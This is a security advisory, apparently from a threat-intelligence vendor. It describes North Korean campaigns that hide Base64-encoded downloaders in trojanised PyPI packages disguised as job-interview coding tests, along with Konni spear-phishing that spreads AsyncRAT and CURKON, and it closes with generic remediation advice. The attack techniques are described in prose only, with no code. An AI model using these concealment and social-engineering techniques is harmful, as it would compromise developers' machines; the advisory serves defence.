Analysis Summary

A fresh collection of malicious Python packages that pose as coding evaluations and target software developers has been discovered by cybersecurity researchers. The newly discovered samples were traced to GitHub projects connected to earlier, focused attacks where engineers are lured with the use of fictitious job interviews.

According to the researchers, the activity is a component of the VMConnect campaign, which was initially discovered in August 2023 and is still running strong. There are hints that the Lazarus Group, supported by North Korea, is responsible. North Korean threat actors have made extensive use of job interviews as a means of spreading malware. They either approach gullible developers on platforms like LinkedIn or deceive them into installing malicious software under the guise of a skills test.

For their part, these packages have been hosted on GitHub repositories under their ownership or have been released directly on public repositories like npm and PyPI. Malicious code was found contained in altered versions of trusted PyPI modules like pyrebase and pyperclip. Both the __init__.py file and the accompanying compiled Python file (PYC) within the __pycache__ directory of the corresponding modules contain malicious code.

It is implemented as a Base64-encoded string that hides a downloader function that connects to a command-and-control (C2) server to carry out commands that are sent back to it in response. The threat actors attempted to inflate the sense of urgency in one of the coding assignments found by the researchers by asking candidates to complete a shared Python project in the format of a ZIP file in five minutes and locate and correct a coding error within the next fifteen minutes.

This increases the likelihood that the person would run the package without doing any kind of source code review or security checks beforehand. This guarantees the campaign's malevolent actors that the embedded malware will be run on the developer's computer. The fact that several of these tests purported to be technical interviews for financial organizations such as Capital One and Rookery Capital Limited highlights the way threat actors pose as reputable businesses in the industry to carry out their operations.

The extent of these activities is still unknown, but as Google-owned Mandiant recently noted, potential targets are found and contacted via LinkedIn. Following a chat exchange, the attacker uploaded a ZIP file containing malware called COVERTCATCH, which was posing as a Python coding challenge. This downloaded a second stage of malware that continued to operate on the user's macOS machine through Launch Agents and Launch Daemons.

The development coincides with the disclosure by cybersecurity researchers that the North Korean threat actor, codenamed Konni, is stepping up its attacks against South Korea and Russia by using spear-phishing lures that result in the deployment of AsyncRAT, with overlaps found with a campaign codenamed CLOUD#REVERSER (aka puNK-002). A new malware known as CURKON, a Windows shortcut (LNK) file that acts as a downloader for an AutoIt version of Lilith RAT, is also being spread by some of these attacks. The activity has been connected to a sub-cluster known as puNK-003.

Impact

• Command Execution
• Unauthorized Access
• Identity Theft

Remediation

• Ensure all operating systems and software are up to date with the latest security patches.
• Employ reliable antivirus and antimalware software to detect and block known threats.
• Regularly update these tools to maintain the latest threat intelligence.
• Implement IDPS to detect and prevent unusual network activity, system behavior, or similar threats.
• Enable two-factor authentication (2FA) on your accounts adds an extra layer of security and can help prevent unauthorized access even if your login credentials have been stolen.
• Regularly backing up your important data can help ensure that you don’t lose any critical information in the event of a malware infection or other data loss event.
• Be wary of emails, attachments, and links from unknown sources. Also, avoid downloading software from untrusted sources or clicking on suspicious ads or pop-ups.
• Use email filtering solutions to block malicious attachments and links that may deliver malware to users via phishing emails.
• Segment your network to limit lateral movement for attackers.
• Employ application whitelisting to only allow approved software to run on systems, reducing the risk of unauthorized applications being executed.
• Implement robust monitoring solutions to detect any unusual or suspicious activities, such as unauthorized access attempts or data exfiltration. Establish an effective incident response plan to respond to and mitigate any potential breaches quickly.
• Make sure all of your software, including your operating system and applications, is up-to-date with the latest security patches. This can help prevent vulnerabilities that info-stealers and other types of malware could exploit.